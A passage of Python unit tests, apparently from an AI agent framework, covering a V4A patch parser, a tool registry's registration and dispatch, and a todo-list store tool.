+c
@@ second @@
x
-y
+z
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
assert len(ops[0].hunks) == 2
assert ops[0].hunks[0].context_hint == "first"
assert ops[0].hunks[1].context_hint == "second"
class TestParseAddFile:
def test_add_file(self):
patch = """\
*** Begin Patch
*** Add File: new/module.py
+import os
+
+print("hello")
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
op = ops[0]
assert op.operation == OperationType.ADD
assert op.file_path == "new/module.py"
assert len(op.hunks) == 1
contents = [l.content for l in op.hunks[0].lines if l.prefix == "+"]
assert contents[0] == "import os"
assert contents[2] == 'print("hello")'
class TestParseDeleteFile:
def test_delete_file(self):
patch = """\
*** Begin Patch
*** Delete File: old/stuff.py
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
assert ops[0].operation == OperationType.DELETE
assert ops[0].file_path == "old/stuff.py"
class TestParseMoveFile:
def test_move_file(self):
patch = """\
*** Begin Patch
*** Move File: old/path.py -> new/path.py
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
assert ops[0].operation == OperationType.MOVE
assert ops[0].file_path == "old/path.py"
assert ops[0].new_path == "new/path.py"
class TestParseInvalidPatch:
def test_empty_patch_returns_empty_ops(self):
ops, err = parse_v4a_patch("")
assert err is None
assert ops == []
def test_no_begin_marker_still_parses(self):
patch = """\
*** Update File: f.py
line1
-old
+new
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
def test_multiple_operations(self):
patch = """\
*** Begin Patch
*** Add File: a.py
+content_a
*** Delete File: b.py
*** Update File: c.py
keep
-remove
+add
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 3
assert ops[0].operation == OperationType.ADD
assert ops[1].operation == OperationType.DELETE
assert ops[2].operation == OperationType.UPDATE

View file

@ -0,0 +1,121 @@
"""Tests for the central tool registry."""
import json
from tools.registry import ToolRegistry
def _dummy_handler(args, **kwargs):
return json.dumps({"ok": True})
def _make_schema(name="test_tool"):
return {"name": name, "description": f"A {name}", "parameters": {"type": "object", "properties": {}}}
class TestRegisterAndDispatch:
def test_register_and_dispatch(self):
reg = ToolRegistry()
reg.register(
name="alpha",
toolset="core",
schema=_make_schema("alpha"),
handler=_dummy_handler,
)
result = json.loads(reg.dispatch("alpha", {}))
assert result == {"ok": True}
def test_dispatch_passes_args(self):
reg = ToolRegistry()
def echo_handler(args, **kw):
return json.dumps(args)
reg.register(name="echo", toolset="core", schema=_make_schema("echo"), handler=echo_handler)
result = json.loads(reg.dispatch("echo", {"msg": "hi"}))
assert result == {"msg": "hi"}
class TestGetDefinitions:
def test_returns_openai_format(self):
reg = ToolRegistry()
reg.register(name="t1", toolset="s1", schema=_make_schema("t1"), handler=_dummy_handler)
reg.register(name="t2", toolset="s1", schema=_make_schema("t2"), handler=_dummy_handler)
defs = reg.get_definitions({"t1", "t2"})
assert len(defs) == 2
assert all(d["type"] == "function" for d in defs)
names = {d["function"]["name"] for d in defs}
assert names == {"t1", "t2"}
def test_skips_unavailable_tools(self):
reg = ToolRegistry()
reg.register(
name="available",
toolset="s",
schema=_make_schema("available"),
handler=_dummy_handler,
check_fn=lambda: True,
)
reg.register(
name="unavailable",
toolset="s",
schema=_make_schema("unavailable"),
handler=_dummy_handler,
check_fn=lambda: False,
)
defs = reg.get_definitions({"available", "unavailable"})
assert len(defs) == 1
assert defs[0]["function"]["name"] == "available"
class TestUnknownToolDispatch:
def test_returns_error_json(self):
reg = ToolRegistry()
result = json.loads(reg.dispatch("nonexistent", {}))
assert "error" in result
assert "Unknown tool" in result["error"]
class TestToolsetAvailability:
def test_no_check_fn_is_available(self):
reg = ToolRegistry()
reg.register(name="t", toolset="free", schema=_make_schema(), handler=_dummy_handler)
assert reg.is_toolset_available("free") is True
def test_check_fn_controls_availability(self):
reg = ToolRegistry()
reg.register(
name="t",
toolset="locked",
schema=_make_schema(),
handler=_dummy_handler,
check_fn=lambda: False,
)
assert reg.is_toolset_available("locked") is False
def test_check_toolset_requirements(self):
reg = ToolRegistry()
reg.register(name="a", toolset="ok", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: True)
reg.register(name="b", toolset="nope", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: False)
reqs = reg.check_toolset_requirements()
assert reqs["ok"] is True
assert reqs["nope"] is False
def test_get_all_tool_names(self):
reg = ToolRegistry()
reg.register(name="z_tool", toolset="s", schema=_make_schema(), handler=_dummy_handler)
reg.register(name="a_tool", toolset="s", schema=_make_schema(), handler=_dummy_handler)
assert reg.get_all_tool_names() == ["a_tool", "z_tool"]
def test_handler_exception_returns_error(self):
reg = ToolRegistry()
def bad_handler(args, **kw):
raise RuntimeError("boom")
reg.register(name="bad", toolset="s", schema=_make_schema(), handler=bad_handler)
result = json.loads(reg.dispatch("bad", {}))
assert "error" in result
assert "RuntimeError" in result["error"]

View file

@ -0,0 +1,101 @@
"""Tests for the todo tool module."""
import json
from tools.todo_tool import TodoStore, todo_tool
class TestWriteAndRead:
def test_write_replaces_list(self):
store = TodoStore()
items = [
{"id": "1", "content": "First task", "status": "pending"},
{"id": "2", "content": "Second task", "status": "in_progress"},
]
result = store.write(items)
assert len(result) == 2
assert result[0]["id"] == "1"
assert result[1]["status"] == "in_progress"
def test_read_returns_copy(self):
store = TodoStore()
store.write([{"id": "1", "content": "Task", "status": "pending"}])
items = store.read()
items[0]["content"] = "MUTATED"
assert store.read()[0]["content"] == "Task"
class TestHasItems:
def test_empty_store(self):
store = TodoStore()
assert store.has_items() is False
def test_non_empty_store(self):
store = TodoStore()
store.write([{"id": "1", "content": "x", "status": "pending"}])
assert store.has_items() is True
class TestFormatForInjection:
def test_empty_returns_none(self):
store = TodoStore()
assert store.format_for_injection() is None
def test_non_empty_has_markers(self):
store = TodoStore()
store.write([
{"id": "1", "content": "Do thing", "status": "completed"},
{"id": "2", "content": "Next", "status": "pending"},
])
text = store.format_for_injection()
assert "[x]" in text
assert "[ ]" in text
assert "Do thing" in text
assert "context compression" in text.lower()
class TestMergeMode:
def test_update_existing_by_id(self):
store = TodoStore()
store.write([
{"id": "1", "content": "Original", "status": "pending"},
])
store.write(
[{"id": "1", "status": "completed"}],
merge=True,
)
items = store.read()
assert len(items) == 1
assert items[0]["status"] == "completed"
assert items[0]["content"] == "Original"
def test_merge_appends_new(self):
store = TodoStore()
store.write([{"id": "1", "content": "First", "status": "pending"}])
store.write(
[{"id": "2", "content": "Second", "status": "pending"}],
merge=True,
)
items = store.read()
assert len(items) == 2
class TestTodoToolFunction:
def test_read_mode(self):
store = TodoStore()
store.write([{"id": "1", "content": "Task", "status": "pending"}])
result = json.loads(todo_tool(store=store))
assert result["summary"]["total"] == 1
assert result["summary"]["pending"] == 1
def test_write_mode(self):
store = TodoStore()
result = json.loads(todo_tool(
todos=[{"id": "1", "content": "New", "status": "in_progress"}],
store=store,
))
assert result["summary"]["in_progress"] == 1
def test_no_store_returns_error(self):
result = json.loads(todo_tool())
assert "error" in result